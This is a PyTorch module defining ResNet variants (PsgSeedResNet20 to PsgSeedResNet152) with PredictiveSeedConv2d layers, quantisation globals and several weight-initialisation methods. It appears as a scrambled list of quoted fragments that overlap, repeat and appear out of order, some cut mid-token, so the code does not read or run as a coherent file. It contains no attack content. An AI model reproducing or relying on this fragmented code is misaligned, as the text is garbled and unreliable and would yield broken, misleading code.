torch.no_grad(): new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape)", "module.weight.data = module.weight.data.sign() * std elif init_method == \"kaiming_constant_unsigned\": fan", "32 NUM_BITS_GRAD = None BIPRECISION = False PREDICTIVE_FORWARD = False", "= layers.Linear(512*block.expansion, num_classes) elif self.in_planes == 16: self.layer1 = self._make_layer(block,", "self.layer1(out) out = self.layer2(out) out = self.layer3(out) if self.layer4 is", "writer_prefix=writer_prefix) class BasicBlock(nn.Module): expansion = 1 def __init__(self, in_planes, planes,", "None BIPRECISION = False PREDICTIVE_FORWARD = False WRITER = None", "to {}'.format(init_method)) def reset_parameters(self, module, init_method=\"kaiming_uniform\") -> None: if init_method", "import isin import torch import torch.nn as nn import torch.nn.functional", "/ float(fan_in + fan_out)) with torch.no_grad(): module.weight.data = module.weight.data.sign() *", "import layers # Fixed NUM_BITS = 32 NUM_BITS_WEIGHT = 32", "sign return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet152( num_classes=10, init_method='standard',", "self.layer4 is not None: out = self.layer4(out) # out =", "as nn import torch.nn.functional as F import math import numpy", "128, num_blocks[1], stride=2) self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2) self.layer4", "def __init__(self, in_planes, planes, stride=1): super(BasicBlock, self).__init__() self.conv1 = conv3x3(in_planes,", "with torch.no_grad(): module.weight.data = module.weight.data.sign() * std elif init_method ==", ") def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out = self.bn2(self.conv2(out))", "conv3x3(3, self.in_planes, stride=1, input_signed=True, predictive_forward=False, writer_prefix=None) self.bn1 = 
nn.BatchNorm2d(self.in_planes) if", "predictive_forward return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=1, stride=stride, padding=0, bias=False, num_bits=NUM_BITS,", "self.bn1 = nn.BatchNorm2d(planes) self.conv2 = conv3x3(planes, planes, stride=1, input_signed=False, predictive_forward=False,", "= nn.BatchNorm2d(planes) # self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False) self.conv3", "return ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet50( num_classes=10, init_method='standard', predictive_backward=True,", "predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) # self.conv2 = nn.Conv2d(planes, planes,", "conv3x3(planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) #", "self.linear = nn.Linear(64, num_classes) self.reset_conv_parameters(init_method) print('conv weights reset to {}'.format(init_method))", "None WRITER_PREFIX_COUNTER = 0 # Tunable PREDICTIVE_BACKWARD = True MSB_BITS", "self.in_planes = planes * block.expansion return nn.Sequential(*layers) def forward(self, x):", "list(m.parameters()) return bop_params def get_non_bop_params(self): non_bop_params = [] for m", "Residual Learning for Image Recognition. arXiv:1512.03385 ''' from numpy.lib.arraysetops import", "import math import numpy as np from models.masked_psg_seed_conv import PredictiveSeedConv2d", "mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_uniform\": nn.init.kaiming_uniform_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif", "strides: layers.append(block(self.in_planes, planes, stride)) self.in_planes = planes * block.expansion return", "sparsify SIGN = sign return ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes, init_method=init_method) def", "0 # Tunable PREDICTIVE_BACKWARD = True MSB_BITS = 4 MSB_BITS_WEIGHT", "= [] for m in self.modules(): if isinstance(m, nn.Conv2d): bop_params", "out = self.bn2(self.conv2(out)) out += self.shortcut(x) out = F.relu(out) return", "self.shortcut(x) out = F.relu(out) return out class Bottleneck(nn.Module): expansion =", "import torch.nn as nn import torch.nn.functional as F import math", "= msb_bits_grad THRESHOLD = threshold SPARSIFY = sparsify SIGN =", "fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") scale = gain", "convolution with padding\" predictive_forward = PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d(", "conv1x1(in_planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) #", "{}'.format(init_method)) def reset_parameters(self, module, init_method=\"kaiming_uniform\") -> None: if init_method ==", "== \"kaiming_normal\": nn.init.kaiming_normal_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_uniform\": nn.init.kaiming_uniform_(module.weight,", "import torch import torch.nn as nn import torch.nn.functional as F", "a=math.sqrt(5)) else: raise ValueError(f\"{init_method} is not an initialization option!\") def", "predictive_forward return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False, num_bits=NUM_BITS,", "F.relu(self.bn1(self.conv1(x))) out = self.layer1(out) out = self.layer2(out) out = self.layer3(out)", "if self.layer4 is not None: out = self.layer4(out) # out", "out def PsgSeedResNet20( num_classes=10, 
init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0,", "self.modules(): if isinstance(m, nn.Conv2d): bop_params += list(m.parameters()) return bop_params def", "= conv3x3(planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes)", "SPARSIFY = False SIGN = True def conv1x1(in_planes, out_planes, stride=1,", "self.shortcut(x) out = F.relu(out) return out class ResNet(nn.Module): def __init__(self,", "num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2) self.layer3 =", "return out class ResNet(nn.Module): def __init__(self, block, num_blocks, in_planes=64, num_classes=10,", "MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN PREDICTIVE_BACKWARD = predictive_backward MSB_BITS = msb_bits", "init_method=init_method) def PsgSeedResNet152( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0,", "planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) self.shortcut =", "def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out = self.bn2(self.conv2(out)) out", "def _make_layer(self, block, planes, num_blocks, stride): strides = [stride] +", "= torch.ones_like(module.weight.data) * std elif init_method == \"kaiming_normal\": nn.init.kaiming_normal_(module.weight, mode=\"fan_in\",", "ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet50( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4,", "threshold=0.0, sparsify=False, sign=True ): global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD,", "F.avg_pool2d(out, out.size()[3]) out = out.view(out.size(0), -1) out = self.linear(out) return", "nn.BatchNorm2d(self.expansion*planes) ) def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out =", "= nn.init.calculate_gain(\"relu\") std = gain / math.sqrt(fan) with torch.no_grad(): module.weight.data", "non_bop_params = [] for m in self.modules(): if isinstance(m, (nn.Linear,", "expansion = 1 def __init__(self, in_planes, planes, stride=1): super(BasicBlock, self).__init__()", "msb_bits_grad THRESHOLD = threshold SPARSIFY = sparsify SIGN = sign", "= sign return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet101( num_classes=10,", "num_classes=num_classes, init_method=init_method) def PsgSeedResNet34( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,", "'''ResNet using PSG in PyTorch. 
For Pre-activation ResNet, see 'preact_resnet.py'.", "= 8 THRESHOLD = 0.0 SPARSIFY = False SIGN =", "writer_prefix=\"\"): \"3x3 convolution with padding\" predictive_forward = PREDICTIVE_FORWARD and predictive_forward", "input_signed=False, predictive_forward=False, writer_prefix=None), nn.BatchNorm2d(self.expansion*planes) ) def forward(self, x): out =", "elif init_method == \"xavier_constant\": fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight) std =", "nn.Linear(512*block.expansion, num_classes) #self.linear = layers.Linear(512*block.expansion, num_classes) elif self.in_planes == 16:", "scale = gain / math.sqrt(2.0 * fan) with torch.no_grad(): new_weight", "out = out.view(out.size(0), -1) out = self.linear(out) return out def", "def PsgSeedResNet50( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False,", "input_signed=False, predictive_forward=True, writer_prefix=\"\"): \"3x3 convolution with padding\" predictive_forward = PREDICTIVE_FORWARD", "num_blocks[2], stride=2) self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2) self.linear =", "init_method == \"kaiming_constant_signed\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\")", "nn.BatchNorm2d(planes) self.shortcut = nn.Sequential() if stride != 1 or in_planes", "return ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes, init_method=init_method) def PsgSeedResNet34( num_classes=10, init_method='standard', predictive_backward=True,", "predictive_forward=True, writer_prefix=\"\"): \"1x1 convolution with no padding\" predictive_forward = PREDICTIVE_FORWARD", "writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) self.conv2 = conv3x3(planes, planes, stride=1, input_signed=False,", "sparsify SIGN = sign return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method) def", "predictive_backward MSB_BITS = msb_bits MSB_BITS_WEIGHT = msb_bits_weight MSB_BITS_GRAD = msb_bits_grad", "super(Bottleneck, self).__init__() # self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False) self.conv1", "models.masked_psg_seed_conv import PredictiveSeedConv2d from masked_layers import layers # Fixed NUM_BITS", "init_method == \"xavier_normal\": nn.init.xavier_normal_(module.weight) elif init_method == \"xavier_constant\": fan_in, fan_out", "self.linear = nn.Linear(512*block.expansion, num_classes) #self.linear = layers.Linear(512*block.expansion, num_classes) elif self.in_planes", "mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_laplace\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\")", "self._make_layer(block, 256, num_blocks[2], stride=2) self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)", "in self.modules(): if isinstance(m, (nn.Linear, nn.BatchNorm2d,)): non_bop_params += list(m.parameters()) return", "nn.Conv2d): self.reset_parameters(m, init_method) def get_bop_params(self): bop_params = [] for m", "isinstance(m, nn.Conv2d): self.reset_parameters(m, init_method) def get_bop_params(self): bop_params = [] for", "= self._make_layer(block, 64, num_blocks[2], stride=2) self.layer4 = None self.linear =", "from numpy.lib.arraysetops import isin import torch import torch.nn as nn", "= nn.Sequential( # nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False), conv1x1(in_planes, self.expansion*planes,", "[3,8,36,3], num_classes=num_classes, 
init_method=init_method) def test(): net = ResNet18() y =", "std elif init_method == \"standard\": nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5)) else: raise ValueError(f\"{init_method}", "if init_method == \"kaiming_constant_signed\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain =", "return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT,", "bop_params = [] for m in self.modules(): if isinstance(m, nn.Conv2d):", "m in self.modules(): if isinstance(m, (nn.Linear, nn.BatchNorm2d,)): non_bop_params += list(m.parameters())", "self.in_planes = in_planes self.conv1 = conv3x3(3, self.in_planes, stride=1, input_signed=True, predictive_forward=False,", "out = self.linear(out) return out def PsgSeedResNet20( num_classes=10, init_method='standard', predictive_backward=True,", "Pre-activation ResNet, see 'preact_resnet.py'. Reference: [1] <NAME>, <NAME>, <NAME>, <NAME>", "class Bottleneck(nn.Module): expansion = 4 def __init__(self, in_planes, planes, stride=1):", "return ResNet(BasicBlock, [3,3,3], in_planes=16, num_classes=num_classes, init_method=init_method) def PsgSeedResNet18( num_classes=10, init_method='standard',", "= sign return ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes, init_method=init_method) def PsgSeedResNet34( num_classes=10,", "= nn.BatchNorm2d(self.in_planes) if self.in_planes == 64: # self.conv1 = nn.Conv2d(3,", "out.size()[3]) out = out.view(out.size(0), -1) out = self.linear(out) return out", "self.conv2 = conv3x3(planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 =", "False SIGN = True def conv1x1(in_planes, out_planes, stride=1, input_signed=True, predictive_forward=True,", "= True def conv1x1(in_planes, out_planes, stride=1, input_signed=True, predictive_forward=True, writer_prefix=\"\"): \"1x1", "in_planes self.conv1 = conv3x3(3, self.in_planes, stride=1, input_signed=True, predictive_forward=False, writer_prefix=None) self.bn1", "def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out = self.layer1(out) out", "msb_bits MSB_BITS_WEIGHT = msb_bits_weight MSB_BITS_GRAD = msb_bits_grad THRESHOLD = threshold", "+= list(m.parameters()) return non_bop_params def _make_layer(self, block, planes, num_blocks, stride):", "reset_conv_parameters(self, init_method=\"standard\") -> None: for m in self.modules(): if isinstance(m,", "ResNet(nn.Module): def __init__(self, block, num_blocks, in_planes=64, num_classes=10, init_method='standard'): super(ResNet, self).__init__()", "threshold SPARSIFY = sparsify SIGN = sign return ResNet(BasicBlock, [2,2,2,2],", "new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape) module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach()) elif init_method", "class ResNet(nn.Module): def __init__(self, block, num_blocks, in_planes=64, num_classes=10, init_method='standard'): super(ResNet,", "SIGN = sign return ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes, init_method=init_method) def PsgSeedResNet34(", "self.expansion*planes, kernel_size=1, bias=False) self.conv3 = conv1x1(planes, self.expansion*planes, stride=1, input_signed=False, predictive_forward=False,", "std = math.sqrt(2.0 / float(fan_in + fan_out)) with torch.no_grad(): module.weight.data", "Bottleneck(nn.Module): expansion = 4 def __init__(self, in_planes, planes, stride=1): super(Bottleneck,", "= F.relu(self.bn1(self.conv1(x))) 
out = F.relu(self.bn2(self.conv2(out))) out = self.bn3(self.conv3(out)) out +=", "writer_prefix=writer_prefix) def conv3x3(in_planes, out_planes, stride=1, input_signed=False, predictive_forward=True, writer_prefix=\"\"): \"3x3 convolution", "for m in self.modules(): if isinstance(m, (nn.Linear, nn.BatchNorm2d,)): non_bop_params +=", "conv3x3(planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) self.shortcut", "kernel_size=3, stride=stride, padding=1, bias=False) self.conv2 = conv3x3(planes, planes, stride=stride, input_signed=False,", "nn.init._calculate_fan_in_and_fan_out(module.weight) std = math.sqrt(2.0 / float(fan_in + fan_out)) with torch.no_grad():", "nn.init.kaiming_uniform_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_laplace\": fan = nn.init._calculate_correct_fan(module.weight,", "self.layer4 = None self.linear = nn.Linear(64, num_classes) self.reset_conv_parameters(init_method) print('conv weights", "= 4 MSB_BITS_WEIGHT = 4 MSB_BITS_GRAD = 8 THRESHOLD =", "with padding\" predictive_forward = PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d( in_planes,", "self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False) self.conv2 =", "predictive_forward=False, writer_prefix=None) self.bn3 = nn.BatchNorm2d(self.expansion*planes) self.shortcut = nn.Sequential() if stride", "SIGN = sign return ResNet(BasicBlock, [3,3,3], in_planes=16, num_classes=num_classes, init_method=init_method) def", "self.shortcut = nn.Sequential() if stride != 1 or in_planes !=", "-> None: if init_method == \"kaiming_constant_signed\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\")", "\"1x1 convolution with no padding\" predictive_forward = PREDICTIVE_FORWARD and predictive_forward", "block.expansion return nn.Sequential(*layers) def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out", "= None self.linear = nn.Linear(64, num_classes) self.reset_conv_parameters(init_method) print('conv weights reset", "\"kaiming_normal\": nn.init.kaiming_normal_(module.weight, mode=\"fan_in\", nonlinearity=\"relu\") elif init_method == \"kaiming_uniform\": nn.init.kaiming_uniform_(module.weight, mode=\"fan_in\",", "(nn.Linear, nn.BatchNorm2d,)): non_bop_params += list(m.parameters()) return non_bop_params def _make_layer(self, block,", "def PsgSeedResNet18( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False,", "SPARSIFY, SIGN PREDICTIVE_BACKWARD = predictive_backward MSB_BITS = msb_bits MSB_BITS_WEIGHT =", "= 4 MSB_BITS_GRAD = 8 THRESHOLD = 0.0 SPARSIFY =", "= nn.BatchNorm2d(planes) self.shortcut = nn.Sequential() if stride != 1 or", "nn.BatchNorm2d(self.expansion*planes) self.shortcut = nn.Sequential() if stride != 1 or in_planes", "return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method) def test(): net = ResNet18()", "input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) # self.conv2 = nn.Conv2d(planes,", "in_planes != self.expansion*planes: self.shortcut = nn.Sequential( # nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1,", "nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False) self.conv3 = conv1x1(planes, self.expansion*planes, stride=1, input_signed=False,", "Reference: [1] <NAME>, <NAME>, <NAME>, <NAME> Deep Residual Learning for", 
"size=module.weight.shape) module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach()) elif init_method == \"xavier_normal\": nn.init.xavier_normal_(module.weight) elif", "num_classes=num_classes, init_method=init_method) def PsgSeedResNet18( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,", "ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet101( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4,", "stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) # self.conv2 =", "sign return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method) def test(): net =", "from models.masked_psg_seed_conv import PredictiveSeedConv2d from masked_layers import layers # Fixed", "SIGN = sign return ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet50(", "torch.nn as nn import torch.nn.functional as F import math import", "in PyTorch. For Pre-activation ResNet, see 'preact_resnet.py'. Reference: [1] <NAME>,", "= self._make_layer(block, 256, num_blocks[2], stride=2) self.layer4 = self._make_layer(block, 512, num_blocks[3],", "def get_bop_params(self): bop_params = [] for m in self.modules(): if", "def reset_parameters(self, module, init_method=\"kaiming_uniform\") -> None: if init_method == \"kaiming_constant_signed\":", "not an initialization option!\") def reset_conv_parameters(self, init_method=\"standard\") -> None: for", "== \"standard\": nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5)) else: raise ValueError(f\"{init_method} is not an", "= self._make_layer(block, 64, num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 128, num_blocks[1],", "= [] for stride in strides: layers.append(block(self.in_planes, planes, stride)) self.in_planes", "num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2) self.layer3 =", "numpy as np from models.masked_psg_seed_conv import PredictiveSeedConv2d from masked_layers import", "def __init__(self, in_planes, planes, stride=1): super(Bottleneck, self).__init__() # self.conv1 =", "sign=True ): global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN", "stride=1, padding=1, bias=False) self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1) self.layer2", "kernel_size=1, stride=stride, padding=0, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward,", "= nn.Linear(64, num_classes) self.reset_conv_parameters(init_method) print('conv weights reset to {}'.format(init_method)) def", "* std elif init_method == \"standard\": nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5)) else: raise", "padding=1, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS,", "self.conv1 = conv3x3(3, self.in_planes, stride=1, input_signed=True, predictive_forward=False, writer_prefix=None) self.bn1 =", "planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) self.conv2 =", "sparsify SIGN = sign return 
ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes, init_method=init_method) def", "PREDICTIVE_BACKWARD = predictive_backward MSB_BITS = msb_bits MSB_BITS_WEIGHT = msb_bits_weight MSB_BITS_GRAD", "#self.linear = layers.Linear(512*block.expansion, num_classes) elif self.in_planes == 16: self.layer1 =", "= sign return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method) def test(): net", "module.weight.data = torch.ones_like(module.weight.data) * std elif init_method == \"kaiming_normal\": nn.init.kaiming_normal_(module.weight,", "= np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape) module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach()) elif init_method ==", "True MSB_BITS = 4 MSB_BITS_WEIGHT = 4 MSB_BITS_GRAD = 8", "biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN,", "nn.BatchNorm2d(planes) # self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)", "MSB_BITS = msb_bits MSB_BITS_WEIGHT = msb_bits_weight MSB_BITS_GRAD = msb_bits_grad THRESHOLD", "std = gain / math.sqrt(fan) with torch.no_grad(): module.weight.data = module.weight.data.sign()", "num_classes=num_classes, init_method=init_method) def test(): net = ResNet18() y = net(torch.randn(1,3,32,32))", "in_planes=64, num_classes=10, init_method='standard'): super(ResNet, self).__init__() self.in_planes = in_planes self.conv1 =", "nn.BatchNorm2d(planes) self.conv2 = conv3x3(planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2", "self.expansion*planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None), nn.BatchNorm2d(self.expansion*planes) ) def forward(self, x):", "<NAME> Deep Residual Learning for Image Recognition. 
arXiv:1512.03385 ''' from", "False WRITER = None WRITER_PREFIX_COUNTER = 0 # Tunable PREDICTIVE_BACKWARD", "nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False), conv1x1(in_planes, self.expansion*planes, stride=stride, input_signed=False, predictive_forward=False,", "= conv1x1(in_planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes)", "bias=False) self.conv1 = conv1x1(in_planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1", "num_blocks[1], stride=2) self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2) self.layer4 =", "is not an initialization option!\") def reset_conv_parameters(self, init_method=\"standard\") -> None:", "None: for m in self.modules(): if isinstance(m, nn.Conv2d): self.reset_parameters(m, init_method)", "layers.append(block(self.in_planes, planes, stride)) self.in_planes = planes * block.expansion return nn.Sequential(*layers)", "__init__(self, block, num_blocks, in_planes=64, num_classes=10, init_method='standard'): super(ResNet, self).__init__() self.in_planes =", "stride=1, input_signed=False, predictive_forward=True, writer_prefix=\"\"): \"3x3 convolution with padding\" predictive_forward =", "num_classes=num_classes, init_method=init_method) def PsgSeedResNet152( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8,", "= self._make_layer(block, 16, num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 32, num_blocks[1],", "num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed, predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD, msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY,", "sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) def conv3x3(in_planes, out_planes, stride=1, input_signed=False, predictive_forward=True, writer_prefix=\"\"):", "reset_parameters(self, module, init_method=\"kaiming_uniform\") -> None: if init_method == \"kaiming_constant_signed\": fan", "[3,4,23,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet152( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4,", "planes, stride=1): super(Bottleneck, self).__init__() # self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1,", "= F.relu(out) return out class ResNet(nn.Module): def __init__(self, block, num_blocks,", "sign return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet101( num_classes=10, init_method='standard',", "bias=False) self.conv2 = conv3x3(planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2", "global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN PREDICTIVE_BACKWARD =", "+= self.shortcut(x) out = F.relu(out) return out class ResNet(nn.Module): def", "= self._make_layer(block, 512, num_blocks[3], stride=2) self.linear = nn.Linear(512*block.expansion, num_classes) #self.linear", "num_blocks[2], stride=2) self.layer4 = None self.linear = nn.Linear(64, num_classes) self.reset_conv_parameters(init_method)", "conv1x1(in_planes, out_planes, stride=1, input_signed=True, predictive_forward=True, writer_prefix=\"\"): \"1x1 convolution with no", "= nn.Linear(512*block.expansion, num_classes) #self.linear = 
layers.Linear(512*block.expansion, num_classes) elif self.in_planes ==", "option!\") def reset_conv_parameters(self, init_method=\"standard\") -> None: for m in self.modules():", "module.weight.data = module.weight.data.sign() * std elif init_method == \"standard\": nn.init.kaiming_uniform_(module.weight,", "self).__init__() # self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False) self.conv1 =", "num_blocks, stride): strides = [stride] + [1]*(num_blocks-1) layers = []", "init_method == \"kaiming_constant_unsigned\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\")", "msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD, threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) class BasicBlock(nn.Module): expansion", "writer_prefix=None) self.bn3 = nn.BatchNorm2d(self.expansion*planes) self.shortcut = nn.Sequential() if stride !=", "out_planes, kernel_size=1, stride=stride, padding=0, bias=False, num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD, biprecision=BIPRECISION, input_signed=input_signed,", "elif init_method == \"xavier_normal\": nn.init.xavier_normal_(module.weight) elif init_method == \"xavier_constant\": fan_in,", "module.weight.data.sign() * std elif init_method == \"standard\": nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5)) else:", "= out.view(out.size(0), -1) out = self.linear(out) return out def PsgSeedResNet20(", "THRESHOLD = 0.0 SPARSIFY = False SIGN = True def", "self.conv3 = conv1x1(planes, self.expansion*planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn3 =", "input_signed=True, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(self.in_planes) if self.in_planes == 64:", "convolution with no padding\" predictive_forward = PREDICTIVE_FORWARD and predictive_forward return", "\"xavier_normal\": nn.init.xavier_normal_(module.weight) elif init_method == \"xavier_constant\": fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight)", "init_method == \"kaiming_laplace\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\")", "sign return ResNet(BasicBlock, [3,3,3], in_planes=16, num_classes=num_classes, init_method=init_method) def PsgSeedResNet18( num_classes=10,", "conv1x1(in_planes, self.expansion*planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None), nn.BatchNorm2d(self.expansion*planes) ) def forward(self,", "self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False) self.conv3 = conv1x1(planes, self.expansion*planes,", "predictive_forward = PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=1,", "1 def __init__(self, in_planes, planes, stride=1): super(BasicBlock, self).__init__() self.conv1 =", "= nn.Sequential() if stride != 1 or in_planes != self.expansion*planes:", "if self.in_planes == 64: # self.conv1 = nn.Conv2d(3, 64, kernel_size=3,", "self.reset_parameters(m, init_method) def get_bop_params(self): bop_params = [] for m in", "super(ResNet, self).__init__() self.in_planes = in_planes self.conv1 = conv3x3(3, self.in_planes, stride=1,", "64, num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2) self.layer3", "-1) out = self.linear(out) return out def PsgSeedResNet20( num_classes=10, init_method='standard',", "self.expansion*planes, stride=1, 
